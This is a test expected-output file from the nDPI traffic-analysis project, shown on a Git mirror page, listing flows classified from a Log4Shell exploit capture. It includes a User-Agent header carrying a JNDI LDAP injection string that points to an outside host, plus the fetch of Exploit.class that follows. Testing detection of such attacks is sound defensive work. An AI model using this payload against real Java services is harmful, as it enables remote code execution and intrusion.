vrr/nDPI
2
0
Fork 0
mirror of https://github.com/vel21ripn/nDPI.git synced 2026-04-30 07:59:49 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions 5
nDPI/tests/cfgs/default/result/log4j-webapp-exploit.pcap.out
Ivan Nardi efccc7d5e4
Rework flow breed (#2926) 
Right now, there is, in essence, a static mapping between flow protocols
and flow breeds.
Make it dynamic: allow to have different flows, with the same
classification but differents breeds. This is the same logic that we
already have for categories....

Preliminary work to support breed in category lists.

API change from the app POV: to get the flow breed don't use anymore
`ndpi_get_proto_breed()`, but access directly `struct ndpi_proto->breed`

The functions `ndpi_domain_classify_*()` and
`ndpi_get_host_domain_suffix()` now have a `u_int32_t` parameter as
`class_id` (instead of `u_int_16_t`), with the following logic:
```
class_id = (breed << 16) | category
```
instead of the old:
```
class_id = category
```
Please note that this change is back-compatible: if you are not
interested into breeds, you don't need to update the application code.
2025-09-02 16:54:34 +02:00

45 lines
6.9 KiB
Text
Raw Blame History

DPI Packets (TCP): 54 (7.71 pkts/flow)
Confidence Unknown : 2 (flows)
Confidence DPI : 5 (flows)
Num dissector calls: 341 (48.71 diss/flow)
LRU cache ookla: 0/0/0 (insert/search/found)
LRU cache bittorrent: 0/6/0 (insert/search/found)
LRU cache stun: 0/0/0 (insert/search/found)
LRU cache tls_cert: 0/0/0 (insert/search/found)
LRU cache mining: 0/2/0 (insert/search/found)
LRU cache msteams: 0/0/0 (insert/search/found)
LRU cache fpc_dns: 0/7/0 (insert/search/found)
Automa host: 6/0 (search/found)
Automa domain: 3/0 (search/found)
Automa tls cert: 0/0 (search/found)
Automa risk mask: 0/0 (search/found)
Automa common alpns: 0/0 (search/found)
Patricia risk mask: 0/0 (search/found)
Patricia risk mask IPv6: 0/0 (search/found)
Patricia risk: 0/0 (search/found)
Patricia risk IPv6: 0/0 (search/found)
Patricia protocols: 14/0 (search/found)
Patricia protocols IPv6: 0/0 (search/found)
Unknown 356 25081 2
HTTP 34 6741 3
LDAP 32 2796 2
Unrated 356 25081 2
Acceptable 66 9537 5
Unspecified 356 25081 2
Web 9 1497 1
Download 25 5244 2
System 32 2796 2
1 TCP 172.16.238.10:48534 <-> 172.16.238.11:80 [proto: 7/HTTP][Stack: HTTP][IP: 0/Unknown][ClearText][Confidence: DPI][FPC: 0/Unknown, Confidence: Unknown][DPI packets: 6][cat: Download/7][Breed: Acceptable][7 pkts/692 bytes <-> 6 pkts/1964 bytes][Goodput ratio: 30/79][0.00 sec][Hostname/SNI: 172.16.238.11][bytes ratio: -0.479 (Download)][IAT c2s/s2c min/avg/max/stddev: 0/0 0/0 1/1 0/0][Pkt Len c2s/s2c min/avg/max/stddev: 68/68 99/327 276/1420 72/494][URL: 172.16.238.11/Exploit.class][StatusCode: 200][Content-Type: application/java-vm][Server: SimpleHTTP/0.6 Python/3.4.2][User-Agent: Java/1.8.0_51][Risk: ** Binary App Transfer **** HTTP/TLS/QUIC Numeric Hostname/SNI **** Possible Exploit Attempt **][Risk Score: 310][Risk Info: Suspicious Log4J / Found host 172.16.238.11 / Found mime exe java-vm][TCP Fingerprint: 2_64_29200_2e3cee914fc1/Linux][PLAIN TEXT (GET /Exploit.class HTTP/1.1)][Plen Bins: 0,0,0,0,0,0,66,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,33,0,0,0,0,0]
2 TCP 172.16.238.10:48444 <-> 172.16.238.11:80 [proto: 7/HTTP][Stack: HTTP][IP: 0/Unknown][ClearText][Confidence: DPI][FPC: 0/Unknown, Confidence: Unknown][DPI packets: 6][cat: Download/7][Breed: Acceptable][6 pkts/624 bytes <-> 6 pkts/1964 bytes][Goodput ratio: 33/79][0.01 sec][Hostname/SNI: 172.16.238.11][bytes ratio: -0.518 (Download)][IAT c2s/s2c min/avg/max/stddev: 0/0 1/2 3/3 1/1][Pkt Len c2s/s2c min/avg/max/stddev: 68/68 104/327 276/1420 77/494][URL: 172.16.238.11/Exploit.class][StatusCode: 200][Content-Type: application/java-vm][Server: SimpleHTTP/0.6 Python/3.4.2][User-Agent: Java/1.8.0_51][Risk: ** Binary App Transfer **** HTTP/TLS/QUIC Numeric Hostname/SNI **** Possible Exploit Attempt **][Risk Score: 310][Risk Info: Suspicious Log4J / Found host 172.16.238.11 / Found mime exe java-vm][TCP Fingerprint: 2_64_29200_2e3cee914fc1/Linux][PLAIN TEXT (GGET /Exploit.class HTTP/1.1)][Plen Bins: 0,0,0,0,0,0,66,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,33,0,0,0,0,0]
3 TCP 172.16.238.1:1984 <-> 172.16.238.10:8080 [proto: 7/HTTP][Stack: HTTP][IP: 0/Unknown][ClearText][Confidence: DPI][FPC: 0/Unknown, Confidence: Unknown][DPI packets: 8][cat: Web/5][Breed: Acceptable][5 pkts/994 bytes <-> 4 pkts/503 bytes][Goodput ratio: 65/44][19.29 sec][Hostname/SNI: 192.168.13.31][bytes ratio: 0.328 (Upload)][IAT c2s/s2c min/avg/max/stddev: 1/7 4822/6428 10256/10256 4838/4568][Pkt Len c2s/s2c min/avg/max/stddev: 68/68 199/126 714/291 258/95][URL: 192.168.13.31:8080/log4shell/login][StatusCode: 200][Req Content-Type: application/x-www-form-urlencoded][Content-Type: text/html][User-Agent: jndi:ldap://172.16.238.11:1389/a][Risk: ** Known Proto on Non Std Port **** HTTP/TLS/QUIC Numeric Hostname/SNI **** HTTP Susp Header **** Possible Exploit Attempt **][Risk Score: 310][Risk Info: Suspicious Log4J / Expected 172.16.238.10, found 192.168.13.31 / Found host 192.168.13.31 / Expected on port 80][TCP Fingerprint: 2_64_64240_2e3cee914fc1/Linux][PLAIN TEXT (POST /log)][Plen Bins: 0,0,0,0,0,0,50,0,0,0,0,0,0,0,0,0,0,0,0,0,50,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
4 TCP 172.16.238.10:57650 <-> 172.16.238.11:1389 [proto: 112/LDAP][Stack: LDAP][IP: 0/Unknown][ClearText][Confidence: DPI][FPC: 0/Unknown, Confidence: Unknown][DPI packets: 4][cat: System/18][Breed: Acceptable][9 pkts/739 bytes <-> 8 pkts/727 bytes][Goodput ratio: 16/24][17.91 sec][bytes ratio: 0.008 (Mixed)][IAT c2s/s2c min/avg/max/stddev: 0/5 2545/3580 17700/17700 6187/7060][Pkt Len c2s/s2c min/avg/max/stddev: 68/68 82/91 137/215 22/47][Risk: ** Known Proto on Non Std Port **][Risk Score: 50][Risk Info: Expected on port 389][TCP Fingerprint: 2_64_29200_2e3cee914fc1/Linux][PLAIN TEXT (objectClass)][Plen Bins: 51,16,16,0,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
5 TCP 172.16.238.10:57742 <-> 172.16.238.11:1389 [proto: 112/LDAP][Stack: LDAP][IP: 0/Unknown][ClearText][Confidence: DPI][FPC: 0/Unknown, Confidence: Unknown][DPI packets: 4][cat: System/18][Breed: Acceptable][9 pkts/739 bytes <-> 6 pkts/591 bytes][Goodput ratio: 16/30][0.02 sec][bytes ratio: 0.111 (Mixed)][IAT c2s/s2c min/avg/max/stddev: 0/0 2/1 11/2 4/1][Pkt Len c2s/s2c min/avg/max/stddev: 68/68 82/98 137/215 22/52][Risk: ** Known Proto on Non Std Port **][Risk Score: 50][Risk Info: Expected on port 389][TCP Fingerprint: 2_64_29200_2e3cee914fc1/Linux][PLAIN TEXT (objectClass)][Plen Bins: 51,16,16,0,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
Undetected flows:
1 TCP 172.16.238.10:55408 <-> 10.10.10.31:9001 [proto: 0/Unknown][Stack: Unknown][IP: 0/Unknown][ClearText][Confidence: Unknown][FPC: 0/Unknown, Confidence: Unknown][DPI packets: 24][Breed: Unrated][178 pkts/12940 bytes <-> 176 pkts/12009 bytes][Goodput ratio: 6/0][17.64 sec][bytes ratio: 0.037 (Mixed)][IAT c2s/s2c min/avg/max/stddev: 0/0 65/124 7288/7288 623/831][Pkt Len c2s/s2c min/avg/max/stddev: 68/68 73/68 78/89 3/2][TCP Fingerprint: 2_64_29200_2e3cee914fc1/Linux][Plen Bins: 100,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
2 TCP 172.16.238.10:55498 <-> 10.10.10.31:9001 [proto: 0/Unknown][Stack: Unknown][IP: 0/Unknown][ClearText][Confidence: Unknown][FPC: 0/Unknown, Confidence: Unknown][DPI packets: 2][Breed: Unrated][1 pkts/76 bytes <-> 1 pkts/56 bytes][Goodput ratio: 0/0][0.00 sec][Risk: ** TCP Connection Issues **** Probing Attempt **][Risk Score: 100][Risk Info: TCP probing attempt / Connection refused (server)][TCP Fingerprint: 2_64_29200_2e3cee914fc1/Linux][Plen Bins: 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
Reference in a new issue View git blame Copy permalink